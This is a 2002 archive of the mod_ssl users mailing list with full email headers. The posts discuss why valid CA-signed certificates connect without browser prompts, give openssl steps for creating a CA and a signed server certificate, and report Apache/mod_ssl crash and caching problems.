<8F88657F29DFD11189ED0008C728C6B008A5A58E@nor935-msx6.nor.chevron.com> From: "Ladner, Eric (Eric.Ladner)" To: "'modssl-users@modssl.org'" Subject: Dumb SSL question. Date: Tue, 2 Apr 2002 14:22:40 -0600 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) X-WSS-ID: 10B4CC9E2287119-01-01 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ladner, Eric (Eric.Ladner)" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users How can I enable mod_ssl and apache to use SSL encryption for browser to server communication without having to have the user accept a certificate? I've noticed several sites do this on the web without asking for you to accept or reject a certificate. Basically, I want to use encryption, but not have the user intervene to enable/disable it. Thanks, Eric Ladner ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 00:14:20 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA22284; Tue, 2 Apr 2002 23:45:34 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from gayguide.at id XAA22117; Tue, 2 Apr 2002 23:43:56 +0200 (MET DST) Received: from team (team.gayguide.at [192.168.1.11]) by gayguide.at (8.9.3/8.9.3) with SMTP id AAA26618 for ; Wed, 3 Apr 2002 00:36:14 +0200 From: =?iso-8859-1?Q?Peter_St=F6hr?= To: Subject: AW: Dumb SSL question. Date: Tue, 2 Apr 2002 23:42:30 +0200 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 In-Reply-To: <8F88657F29DFD11189ED0008C728C6B008A5A58E@nor935-msx6.nor.chevron.com> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: =?iso-8859-1?Q?Peter_St=F6hr?= X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi Eric, For example you can buy a certificate from Thawte (www.thawte.com) or Verisign (www.verisign.com) I hope, this was helpful. Rgds, Peter Stoehr GAYNET.AT -----Ursprüngliche Nachricht----- Von: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]Im Auftrag von Ladner, Eric (Eric.Ladner) Gesendet: Dienstag, 02. April 2002 22:23 An: 'modssl-users@modssl.org' Betreff: Dumb SSL question. How can I enable mod_ssl and apache to use SSL encryption for browser to server communication without having to have the user accept a certificate? I've noticed several sites do this on the web without asking for you to accept or reject a certificate. Basically, I want to use encryption, but not have the user intervene to enable/disable it. Thanks, Eric Ladner ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 01:12:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA00185; Wed, 3 Apr 2002 00:57:26 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ns1.microanswers.net id AAA00029; Wed, 3 Apr 2002 00:55:26 +0200 (MET DST) Received: from ws1 (microanswers.net [63.230.56.77] (may be forged)) by ns1.microanswers.net (8.11.0/8.11.0) with SMTP id g32MqkO05819 for ; Tue, 2 Apr 2002 16:52:47 -0600 Message-ID: <035601c1da92$d7c0c620$4d38e63f@microanswers.net> From: "Andrew Lietzow" To: References: <8F88657F29DFD11189ED0008C728C6B008A5A58E@nor935-msx6.nor.chevron.com> Subject: Re: Dumb SSL question. Date: Tue, 2 Apr 2002 16:07:55 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Andrew Lietzow" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Eric Ladner wrote.... RE:>>Basically, I want to use encryption, but not have the user intervene to enable/disable it. ------------------ In IE 5.5; Tools, Internet Options, Security, Custom Level... Enable "Don't prompt for Client Certificate..." (or is it "Disable" -- it's a double negative and I always had trouble with those... :-) Don't know if this will help but it SEEMS like it could address your question from the client side. Good luck! Andrew Lietzow The ACL Group, Inc. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 01:17:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA01661; Wed, 3 Apr 2002 01:15:32 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from portalhr1.chevron.com id BAA01493; Wed, 3 Apr 2002 01:13:29 +0200 (MET DST) Received: from hou281-wss2.chevron.com (hou281-wss2.chevron.com [146.22.218.9] (may be forged)) by portalhr1.chevron.com (8.11.6/8.11.6) with SMTP id g32LoVO28829 for ; Tue, 2 Apr 2002 15:50:31 -0600 (CST) Received: from 146.22.111.10 by hou281-wss2.chevron.com with ESMTP ( ChevronTexaco Mail (MMS v4.7)); Tue, 02 Apr 2002 15:50:30 -0600 X-Server-Uuid: 26fe3e76-19dd-11d3-be09-0008c7b1f151 Received: by hou281-msxb1.chevron.com with Internet Mail Service ( 5.5.2650.21) id <2DJ2NT4J>; Tue, 2 Apr 2002 15:50:30 -0600 Message-ID: <8F88657F29DFD11189ED0008C728C6B008A5A591@nor935-msx6.nor.chevron.com> From: "Ladner, Eric (Eric.Ladner)" To: "'modssl-users@modssl.org'" Subject: RE: Dumb SSL question. Date: Tue, 2 Apr 2002 15:50:27 -0600 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) X-WSS-ID: 10B4F82C46721-01-01 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ladner, Eric (Eric.Ladner)" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Oops.. I finally found this info in the mailing list. I still have a question though.. What mechanism is it that will allow an encrypted communication (a connection to the https side of the web server) without popping up the View/Accept/Whatever dialog for the certificate? Is there a validation done between on the client to the issuer of the certificat and it's just accepted if the certificate is validated? (i.e. the cert is validated with verisign, or whoever, and is just accepted if everything checks out ok). Thanks, Eric "I should search the archives better" Ladner -----Original Message----- From: Ladner, Eric (Eric.Ladner) [mailto:Eric.Ladner@chevrontexaco.com] Sent: Tuesday, April 02, 2002 2:23 PM To: 'modssl-users@modssl.org' Subject: Dumb SSL question. How can I enable mod_ssl and apache to use SSL encryption for browser to server communication without having to have the user accept a certificate? I've noticed several sites do this on the web without asking for you to accept or reject a certificate. Basically, I want to use encryption, but not have the user intervene to enable/disable it. Thanks, Eric Ladner ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 01:36:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id BAA03369; Wed, 3 Apr 2002 01:35:25 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from opiate.divisionbyzero.com id BAA03350; Wed, 3 Apr 2002 01:34:52 +0200 (MET DST) Received: from devotchka (unknown [64.165.63.157]) by opiate.divisionbyzero.com (Postfix) with ESMTP id 786C96F928 for ; Tue, 2 Apr 2002 15:34:44 -0800 (PST) Subject: ca cert questions (was Re: Dumb SSL question) From: jon schatz To: modssl-users@modssl.org In-Reply-To: <8F88657F29DFD11189ED0008C728C6B008A5A591@nor935-msx6.nor.chevron.com> References: <8F88657F29DFD11189ED0008C728C6B008A5A591@nor935-msx6.nor.chevron.com> Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-bh5VOrtiVlmnK3TelFUs" X-Mailer: Ximian Evolution 1.0.3 Date: 02 Apr 2002 15:34:42 -0800 Message-Id: <1017790483.25186.27.camel@devotchka.pulse3d.com> Mime-Version: 1.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: jon schatz X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --=-bh5VOrtiVlmnK3TelFUs Content-Type: text/plain Content-Transfer-Encoding: quoted-printable On Tue, 2002-04-02 at 13:50, Ladner, Eric (Eric.Ladner) wrote: > What mechanism is it that will allow an encrypted communication (a > connection to the https side of the web server) without popping up > the View/Accept/Whatever dialog for the certificate? All that's required is a valid cert ( valid date, correct servername) signed by a valid CA (installed on your web browser or on the remote server). which brings me to my question: my company purchased a cert from geotrust. initially, we couldn't make the cert work (we got ie dialog saying that the cert was from a company we had not chose to trust). geotrust had me install a CA cert on the server and use 'SSLCACertificateFile' to point to it. magically, ie then trusted the certificate. so why does this work? i mean, why can't i start forging ssl certificates that are trusted by my own ca files that i host locally? do browsers do any verification of ca files served up by remote machines? feel free to point me to documentation on this one... -jon --=20 jon@divisionbyzero.com || www.divisionbyzero.com gpg key: www.divisionbyzero.com/pubkey.asc think i have a virus?: www.divisionbyzero.com/pgp.html "You are in a twisty little maze of Sendmail rules, all confusing."=20 --=-bh5VOrtiVlmnK3TelFUs Content-Type: application/pgp-signature; name=signature.asc Content-Description: This is a digitally signed message part -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQA8qkASwj1gFegse14RAme6AJ99MxIYkyXrMtN7vbRBvceqLOHCJQCePR5r iDnPGwVT4EcXiana2G06LyU= =QFFw -----END PGP SIGNATURE----- --=-bh5VOrtiVlmnK3TelFUs-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 02:05:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id CAA05268; Wed, 3 Apr 2002 02:04:38 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from romeo.rtfm.com id CAA05241; Wed, 3 Apr 2002 02:04:07 +0200 (MET DST) Received: (ekr@localhost) by romeo.rtfm.com (8.11.3/8.6.4) id g3305D333485; Tue, 2 Apr 2002 16:05:13 -0800 (PST) To: modssl-users@modssl.org Subject: Re: Dumb SSL question. References: <8F88657F29DFD11189ED0008C728C6B008A5A591@nor935-msx6.nor.chevron.com> Mime-Version: 1.0 (generated by tm-edit 7.108) Content-Type: text/plain; charset=US-ASCII From: Eric Rescorla Date: 02 Apr 2002 16:05:13 -0800 In-Reply-To: "Ladner, Eric's message of "Tue, 2 Apr 2002 15:50:27 -0600" Message-ID: Lines: 28 X-Mailer: Gnus v5.6.45/XEmacs 20.4 - "Emerald" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Eric Rescorla X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users "Ladner, Eric (Eric.Ladner)" writes: > Oops.. I finally found this info in the mailing list. > > I still have a question though.. > > What mechanism is it that will allow an encrypted communication (a > connection to the https side of the web server) without popping up > the View/Accept/Whatever dialog for the certificate? > > Is there a validation done between on the client to the issuer of > the certificat and it's just accepted if the certificate is validated? > (i.e. the cert is validated with verisign, or whoever, and is just > accepted if everything checks out ok). Believe it or not, this is how things are SUPPOSED to work. If the certificate is a valid certificate (descends from a trusted root, not on a CRL, etc.) and has the correct name then you get connected without any dialog (or maybe a "you are about to enter a secure connection" dialog). It's only if something is wrong that you get a pop-up. It's a sad testament to how often things are wrong that people consider the pop-up the normal state of affairs. -Ekr -- [Eric Rescorla ekr@rtfm.com] http://www.rtfm.com/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 02:25:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id CAA06690; Wed, 3 Apr 2002 02:24:38 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from exchange00.SC.ESILICON.COM id CAA06657; Wed, 3 Apr 2002 02:23:56 +0200 (MET DST) Received: by exchange00.SC.ESILICON.COM with Internet Mail Service (5.5.2653.19) id ; Tue, 2 Apr 2002 10:37:58 -0800 Message-ID: <691874941F1F954198F7E7FCBAEF1FAE0D1D56@exchange00.SC.ESILICON.COM> From: David Marshall To: "'modssl-users@modssl.org'" Subject: RE: SSL cache issue Date: Tue, 2 Apr 2002 10:37:52 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: David Marshall X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Make sure that the "JSPs" in question are resolving their url's with the right protocol HTTPS/HTTP when appropriate. The JSPs may be trying to GET/POST with HTTP when they need to use HTTPS. Since you are using Apache and RESIN. I would assume that you are using the mod_caucho plug-in for Apache. David Marshall -----Original Message----- From: Shiraz Esat [mailto:shiraz.esat@designlinks.net] Sent: Tuesday, April 02, 2002 1:10 AM To: 'modssl-users@modssl.org' Subject: RE: SSL cache issue Terry, If anyone passes you a solution, can you please pass it on to me as well, as I have the same problem :( [Only difference, though, is that I'm using PHP generated pages] Thanks in advance Shiraz -----Original Message----- From: Terry Ziemniak [SMTP:terry.ziemniak@swc.com] Sent: Friday, March 29, 2002 9:31 PM To: 'modssl-users@modssl.org' Subject: SSL cache issue I am getting 'page not found errors' the first time I access certain JSP pages (though there are others that always work). If I refresh the page displays correctly. Notes: 1. This only happens over HTTPS, never over HTTP 2. Netscape (v 4.2) displayed the error "Data Missing. This document resulted from a POST operation and has expired from the cache. If you wish you can repost the form data to create the document by pressing the reload button." 3. Apache's access.log seems to validate point 2. The last line before an error is a POST. The retry shows a POST followed shortly by anther GET and POST of the same JSP. 4. I have not yet been able to exactly describe 'First time'. General rule of them, if I repeat the process within 15 minutes it seems OK. If I wait an hour it should fail. Though quantifying that has not been my highest priority. 5. I am running Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32 and Resin 1.2.8. Any help would be appreciated. Terry Ziemniak << File: ATT00002.htm >> ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 08:50:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id IAA25540; Wed, 3 Apr 2002 08:49:11 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id IAA25474; Wed, 3 Apr 2002 08:48:06 +0200 (MET DST) Received: by visp.engelschall.com (Postfix, from userid 1005) id 94F8A4CE72D; Wed, 3 Apr 2002 08:48:05 +0200 (CEST) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g335CZC21695; Wed, 3 Apr 2002 07:12:35 +0200 (CEST) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from mx0.gmx.net id DAA10949; Wed, 3 Apr 2002 03:56:08 +0200 (MET DST) From: jmos@gmx.net Received: (qmail 4894 invoked by uid 0); 3 Apr 2002 01:56:02 -0000 Date: Wed, 3 Apr 2002 03:56:03 +0200 (MEST) To: modssl-users@modssl.org MIME-Version: 1.0 Subject: Creating client certificates ? X-Priority: 3 (Normal) X-Authenticated-Sender: #0002586498@gmx.net X-Authenticated-IP: [62.104.212.98] Message-ID: <27827.1017798963@www8.gmx.net> X-Mailer: WWW-Mail 1.5 (Global Message Exchange) X-Flags: 0001 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: jmos@gmx.net X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello modssl users ! I managed to set up an ssl aware web server. Although I searched the web and also the list archive I haven't been able to create a client certificate which is signed by my own CA for client authentication. Could someone describe the process of creating such a certificate in detail ? I know it is possible with openssl but as I said before I wasn't able to figure out how. Please help ! -- GMX - Die Kommunikationsplattform im Internet. http://www.gmx.net ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 08:56:09 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id IAA26116; Wed, 3 Apr 2002 08:55:11 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from deepthought.cs.virginia.edu id IAA26089; Wed, 3 Apr 2002 08:54:42 +0200 (MET DST) Received: from localhost (root@localhost) by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g336sXB09501 for ; Wed, 3 Apr 2002 01:54:33 -0500 Date: Wed, 3 Apr 2002 01:54:33 -0500 (EST) From: Cliff Woolley X-X-Sender: root@deepthought.cs.virginia.edu To: modssl-users@modssl.org Subject: Re: ca cert questions (was Re: Dumb SSL question) In-Reply-To: <1017790483.25186.27.camel@devotchka.pulse3d.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Cliff Woolley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On 2 Apr 2002, jon schatz wrote: > we had not chose to trust). geotrust had me install a CA cert on the > server and use 'SSLCACertificateFile' to point to it. magically, ie then > trusted the certificate. so why does this work? i mean, why can't i > start forging ssl certificates that are trusted by my own ca files that > i host locally? do browsers do any verification of ca files served up by > remote machines? feel free to point me to documentation on this one... The difference is that the CA certificate they would have had you install (a) is signed by a CA that the browser *does* trust and (b) contains a flag saying "this certificate may be used to sign other certificates." SSLCertificateChainFile (and SSLCACertificateFile in this case) is all about establishing a chain of trust back to some entity (a root CA) that the browser does trust. Take a look at the CA certificate they gave you... it will have been signed by some root CA (is Thawte the only one that actually provides this service? Maybe Verisign does, I don't know.), and you'll see the special capabilities flags in there as well. --Cliff -------------------------------------------------------------- Cliff Woolley jwoolley@apache.org Apache HTTP Server Project ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 09:20:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id JAA27466; Wed, 3 Apr 2002 09:19:07 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id JAA27444; Wed, 3 Apr 2002 09:18:03 +0200 (MET DST) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id JAA15115 for ; Wed, 3 Apr 2002 09:17:57 +0200 (MET DST) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma015103; Wed, 3 Apr 02 09:17:50 +0200 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id JAA24522 for ; Wed, 3 Apr 2002 09:17:49 +0200 (MET DST) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id JAA27036 for ; Wed, 3 Apr 2002 09:17:48 +0200 (MEST) Message-ID: <3CAAAC9C.B890BD44@bourse.ch> Date: Wed, 03 Apr 2002 09:17:48 +0200 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Creating client certificates ? References: <27827.1017798963@www8.gmx.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users jmos@gmx.net wrote: > > Hello modssl users ! > > I managed to set up an ssl aware web server. > Although I searched the web and also the list > archive I haven't been able to create a client > certificate which is signed by my own CA for > client authentication. > > Could someone describe the process of creating > such a certificate in detail ? I assume you are working as root with bourne-shell and with the openssl bin directory in your path. Also, many of the command below have many options, check the docs and change to suit. Proceed as follows (assume you are working as root with bourne-shell): STAGE 1: Prepare your CA ------------------------ - First you need a source of random data (skip this if you have /dev/urandom or something): # cp /var/cron/olog temp # gzip temp # mv temp.gz random_data # RANDFILE=/home/apached/ssl/certs/random_data # export RANDFILE - Create a RSA private key (ca.key) for your Certificate Authority and choose a password for your CA (e.g. "CA_PASSWORD"). # openssl genrsa -des3 -out ca.key 1024 - Now make the certificate (ca.crt) using the private key. # openssl req -new -x509 -days 365 -key ca.key -out ca.crt It is here you define the details of the certificate authority, e.g. Country Name (2 letter code) [AU]:UK State or Province Name (full name) [Some-State]:. Locality Name (eg, city) []:London Organization Name (eg, company) [Internet Widgits Pty Ltd]:ACME Inc. Organizational Unit Name (eg, section) []:ACME Internet (Unofficial CA) Common Name (eg, YOUR name) []:www.acme.com Email Address []:e-services@acme.com STAGE 2: MAKE A CERT FOR YOUR SITE ---------------------------------- - Make a private key for www.banana.com # openssl genrsa -des3 -out banana.key 1024 - You will be prompted for a password. If you later use the certificate, the server will not start until you enter the password. If you want to avoid having a password, you have to write out the key and save it again. # openssl rsa -in banana.key -out temp_key # mv temp_key banana.key - now banana.key is unencrypted. Next, make a certificate signing request: # openssl req -new -key banana.key -out banana.csr It is here you define the details of the website, e.g. Country Name (2 letter code) [AU]:UK State or Province Name (full name) [Some-State]:. Locality Name (eg, city) []:London Organization Name (eg, company) [Internet Widgits Pty Ltd]:Banana Inc. Organizational Unit Name (eg, section) []:Banana Internet Common Name (eg, YOUR name) []:www.banana.com Email Address []:e-services@banana.com - Finally, sign the CSR using the CA certificate: # ./sign.sh eex.csr - you need to enter the CA password to sign it. You finish up with banana.crt and banana.key which you move to the server and refer to with SSLCertificateFile and SSLCertificateKeyFile. You can remove banana.csr. Rgds, Owen Boyle. PS: Regarding removing the passphrase on the certificate - it is up to you whether to do this or not. If you want certificates that no-one can steal but don't mind typing in a passowrd every time you start the server, leave it on. If you prefer to have an automated server start but are willing to risk certificate theft, remove it. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 13:35:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA11213; Wed, 3 Apr 2002 13:34:10 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from cisco.com id NAA11202; Wed, 3 Apr 2002 13:33:48 +0200 (MET DST) Received: from cisco.com ([192.135.242.65]) by cisco.com (8.8.8/2.6/Cisco List Logging/8.8.8) with ESMTP id RAA24025; Wed, 3 Apr 2002 17:03:11 +0530 (IST) Message-ID: <3CAAE892.DCE888AA@cisco.com> Date: Wed, 03 Apr 2002 17:03:38 +0530 From: Hassan S Organization: HCL-Cisco X-Mailer: Mozilla 4.78 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: "modssl-users@modssl.org" , "Ralf S. Engelschall" Subject: ModSSL 2.8.8 + Apache 1.3.24 crashing on Windows Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Hassan S X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I have a situation where I have to redirect from a HTTP to a HTTPS connection via a servlet. That is I send a HTTP GET request to a servlet which in reply sends a redirect to a web page with the URL protocol changed to HTTPS. Till Apache 1.3.20+ModSSL 2.8.4 this was working fine. But after I upgraded to Apache 1.3.24+ModSSL 2.8.8 (to get the security fixes :) ), it is crashing with a error message like "The instruction at "0x6ff90e08" referenced memory at "0x72676f76". The memory could not be read." If I click Cancel to debug using VC++ it shows an invalid memory access in ApacheCore.dll. My platform config is Windows 2000 MS VC++ 6.0 (SP5) OpenSSL 0.9.6c (built using MASM optimizations). Please let me know where the problem is, or maybe where I should look to try and debug this. This has become a critical issue for me! Regards, Hassan. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 13:44:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA11684; Wed, 3 Apr 2002 13:43:11 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from dukas.upc.es id NAA11671; Wed, 3 Apr 2002 13:42:52 +0200 (MET DST) Received: from parra.upc.es (parra.upc.es [147.83.36.80]) by dukas.upc.es (8.12.1/8.12.1) with ESMTP id g33BgpXG023890 for ; Wed, 3 Apr 2002 13:42:51 +0200 (MET DST) Received: from localhost (localhost [127.0.0.1]) by parra.upc.es (Postfix) with ESMTP id 20FAD619CA for ; Wed, 3 Apr 2002 13:42:44 +0200 (MET DST) Received: from etsetb.upc.es (dalia.upc.es [147.83.36.36]) by parra.upc.es (Postfix) with ESMTP id 4DC65619C7 for ; Wed, 3 Apr 2002 13:42:40 +0200 (MET DST) Message-ID: <3CAAEA6B.C44A9311@etsetb.upc.es> Date: Wed, 03 Apr 2002 13:41:31 +0200 From: Sergi Mayordomo X-Mailer: Mozilla 4.78 [es] (X11; U; Linux 2.4.7-10 i586) X-Accept-Language: en MIME-Version: 1.0 To: modssl Subject: Nowhere talks about RPMS installation. Is it possible? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-10 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Sergi Mayordomo X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I have: -apache-1.3.22-2.i386.rpm, mod_ssl-2.8.5-4.i386.rpm. under Redhat 7.2 I have php-4.0.6-12.i386.rpm too. Is it normal that when I try $apachectl startssl , or $httpd -SSLD it don't works at all ? the previous commands aren't recognized for apache. Do you know if any RPM version would work correctly ?? Thanks. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Apr 3 14:24:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA14454; Wed, 3 Apr 2002 14:23:10 +0200 (MET DST) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id OAA14432; Wed, 3 Apr 2002 14:22:53 +0200 (MET DST) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id OAA20502 for ; Wed, 3 Apr 2002 14:22:48 +0200 (MET DST) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma020492; Wed, 3 Apr 02 14:22:38 +0200 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id OAA20333 for ; Wed, 3 Apr 2002 14:22:37 +0200 (MET DST) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id OAA23687 for ; Wed, 3 Apr 2002 14:22:36 +0200 (MEST) Message-ID: <3CAAF40C.49B493D5@bourse.ch> Date: Wed, 03 Apr 2002 14:22:36 +0200 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: Nowhere talks about RPMS installation. Is it possible? References: <3CAAEA6B.C44A9311@etsetb.upc.es> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Sergi Mayordomo wrote: > > Hi, > > I have: -apache-1.3.22-2.i386.rpm, mod_ssl-2.8.5-4.i386.rpm. under > Redhat 7.2 > I have php-4.0.6-12.i386.rpm too. > Is it normal that when I try $apachectl startssl , or $httpd -SSLD it > don't works at all ? > the previous commands aren't recognized for apache. 